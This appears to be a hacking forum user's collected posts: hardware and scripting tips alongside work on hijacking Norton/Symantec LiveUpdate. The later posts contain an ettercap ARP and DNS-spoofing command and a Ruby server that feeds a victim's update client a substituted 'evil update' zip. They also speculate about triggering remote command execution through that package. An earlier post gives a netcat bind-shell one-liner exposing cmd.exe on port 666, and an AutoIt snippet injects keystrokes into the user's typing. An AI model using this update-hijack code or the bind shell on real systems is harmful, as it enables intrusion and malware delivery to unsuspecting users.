Posts posted by i8igmac
-
Get an AMD 6-core, the most bang for your buck; you will love it with a good card
and a solid state hard drive.
My Linux boots up in like 1 second.
-
I just got a Droid Thunderbolt (HTC)... I have not yet rooted it, but I'm curious: could you plug in a wifi adapter and install the Linux drivers on a Droid, then start cracking WEP, and maybe run a stronger sniffer?
-
Once you figure out dnsspoof, check out the SET website cloner with the Java applet and reverse Meterpreter.
-
Wine works with AutoIt.
It can be done just as easily with Ruby, Perl, or Python.
-
AutoIt scripting is fun and easy to learn:
#include <Misc.au3> ; provides _IsPressed()
While 1
    If _IsPressed("4A") Then ; "4A" is the virtual-key code for the J key
        Send(" {BACKSPACE} im gay")
    EndIf
    Sleep(10) ; avoid spinning the CPU
WEnd
Install AutoIt and check out the WinZip tutorial.
-
nc -l -p 666 -d cmd.exe
-
I'm not sure why you want it hooked to a TV, maybe explain...
I recommend xrdp.
-
This could be a fun first-timer's project. You should check out the scripting language AutoIt.
if (window exists "instant messenger" with text("power on") then execute("net system power on")
The syntax here is improper; this can be done with only a few lines of code with AutoIt.
You should install AutoIt and check out the WinZip tutorial.
I'm sure you will have lots of fun.
-
sudo apt-cache search rdp | grep server
-
Here is a quick update on what I have done so far... I was going to make a video but I see no need... The client successfully downloads the modified zip file from my computer during the DNS spoof (screenshot of Wireshark); I just need to modify the zip package's contents to trigger execution...
sudo ettercap -T -F filter.ef -P dns_spoof -M arp // //
First, the ettercap filter drops encryption for more plaintext (not sure if it's needed for this situation, but I like to use it).
dns_spoof: [liveupdate.symantecliveupdate.com] spoofed to [192.168.1.104]
sudo ruby exploit.rb
(It's something I put together in a few minutes, don't judge me ;-P)
require 'socket'

#SERVER
server = TCPServer.open(80)
loop {
  client = server.accept
  print client.read(100) #should receive /get /minitri.flg
  client.puts("HTTP/1.1 200 OK Content-Length: 1 Content-Type: text/plain Last-Modified: Fri, 29 Jul 2005 20:24:32 GMT ETag: "+'"'+"1-42ea9080"+'"'+" Accept-Ranges: bytes Date: Sun, 15 May 2011 01:52:21 GMT Connection: keep-alive Cache-Control: public,must-revalidate,max-age=1800\n\r\n\r")
  print client.read(100) #should receive GET /update symnetc from client
  client.print("HTTP/1.1 200 OK Content-Type: application/zip Last-Modified: Sun, 15 May 2011 21:16:04 GMT ETag: W/"+'"'+"15a1-4dd04294"+'"'+" Accept-Ranges: bytes Date: Sun, 15 May 2011 20:50:18 GMT Connection: keep-alive Cache-Control: public,must-revalidate,max-age=240\n\r\n\r")
  #now send payload
  file = open('/home/bigmac/out.zip', "rb") # new evil update
  fileContent = file.read
  client.print(fileContent)
  #client.print "Closing the connection. Bye!"
  # client.close # Disconnect from the client
}
Wireshark screenshot of the zip file downloaded, 192.168.1.102 <---> 192.168.1.104:
img838.imageshack.us/i/screenshotwireshark.png
... I should post the zip file; I'm sure all that is needed is changing a few numbers around to trigger execution.
-
ettercap filter to drop encryption for more plaintext... I fixed my problem with extracting the file ;-)
Instead of pasting to a text editor I just use nc:
netcat xxx.xxx.xx 80 > out.zip
GET /streaming/norton$202009$20streaming$20virus$20definitions_1.0_symalllanguages_livetri.zip HTTP/1.1
If-Modified-Since: Sun, 08 May 2011 03:51:51 GMT
Cache-control: max-age=0
Cache-Control: no-cache
Cache-Control: max-stale=0
Cache-Control: min-fresh=1000
Accept: */*
HOST: liveupdate.symantecliveupdate.com
User-Agent: +V2Ga/n+ZIRfedhlw5VItU2dHhkjA/GTQAAAAALUE
Connection: Keep-Alive
I open out.zip with a text editor, remove the response header field from the top of the file, and the file extracts just fine ;-)
I would really like to share more in depth because this looks promising...
One of the files' contents looks like this, one line:
MOVE([TempDir],%StreamDefDir%)
I think this could give me sort of remote command execution.
A quick test would be 'ping 192.168.1.101' (my laptop IP).
I found this log someone posted and it now gives me a better view of what's going on... hxxp://community.norton.com/norton/attachments/norton/nis_feedback/92741/1/log.lu2.txt
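The header-stripping step in the post above, as an added Ruby example that is not code from the original post: it splits a response captured with netcat into status line, headers and body, checks the body for the zip signature, and compares the declared Content-Length with what was actually received. The capture bytes are constructed for illustration; a real out.zip would be read with File.binread.

```ruby
# Added example, not from the original post: split a raw HTTP response
# (as captured with "nc host 80 > out.zip") into status line, headers and
# body so the body can be saved without hand-editing the file.

# Returns [status_line, headers_hash, body], or nil when no header/body
# separator exists (the data is not an HTTP response at all).
def split_http_response(raw)
  raw = raw.b                        # work on bytes; the body may be binary
  eol = "\r\n"
  sep = raw.index(eol * 2)
  if sep.nil?                        # tolerate bare-LF line endings
    eol = "\n"
    sep = raw.index(eol * 2)
    return nil if sep.nil?
  end
  head = raw[0...sep]
  body = raw[(sep + eol.bytesize * 2)..-1]
  lines = head.split(eol)
  status = lines.shift
  headers = {}
  lines.each do |line|
    name, value = line.split(":", 2)
    next if value.nil?               # skip malformed header lines
    headers[name.strip.downcase] = value.strip
  end
  [status, headers, body]
end

# True when the body begins with a zip local-file-header signature "PK\x03\x04".
def zip_body?(body)
  body.b.start_with?("PK\x03\x04".b)
end

# Declared length vs. bytes actually received; a capture cut short by a
# dropped connection shows up here as a mismatch (nil length is accepted).
def length_matches?(headers, body)
  declared = headers["content-length"]
  declared.nil? || declared.to_i == body.bytesize
end

# Constructed sample capture: headers plus an 8-byte body that starts with
# the zip signature (stands in for File.binread("out.zip")).
SAMPLE_CAPTURE = ("HTTP/1.1 200 OK\r\nContent-Type: application/zip\r\n" \
                  "Content-Length: 8\r\n\r\nPK\x03\x04" + "\x00" * 4).b

if __FILE__ == $0
  status, headers, body = split_http_response(SAMPLE_CAPTURE)
  puts "#{status} | #{headers['content-type']} | zip=#{zip_body?(body)} | " \
       "complete=#{length_matches?(headers, body)} | #{body.bytesize} bytes"
end
```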
-
Maybe I could get someone's opinion. I have captured a GET request like /get symtec/id/dir/update.zip
I can reproduce this GET request with Ruby sockets and receive the binary data of the zip file. I saved this data and tried to extract its contents, but it fails.
I hope to write my own evilgrade-style exploit. Right now I'm on my Droid; I will post this GET request and the binary data tonight. Any thoughts on how to properly handle this zip file? Please share.
Question About Gathering Info (in Questions)
Do me next